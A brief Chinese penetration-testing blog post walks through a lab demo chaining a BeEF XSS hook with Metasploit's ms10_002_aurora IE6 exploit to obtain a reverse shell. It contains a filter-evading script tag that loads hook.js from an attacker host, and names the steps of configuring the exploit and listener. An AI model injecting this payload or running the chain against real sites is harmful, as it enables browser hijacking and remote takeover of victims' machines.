一次xss到rce

发布于 2019-03-18  288 次阅读


本次beef结合msf 完成整个攻击过程
启动beef
beef


xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:

xss执行

配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:

开始监听:

手动游览器执行:

(使用beef重定向到该url也可以)
上线:

反弹shell


Comments


网络安全研究员、渗透测试工程师、F11攻防小组创始人
文能社会工程学,武能过狗拿shell
日的了站,做的了饭。
人生格言:即使是咸鱼,也一定是最咸的那条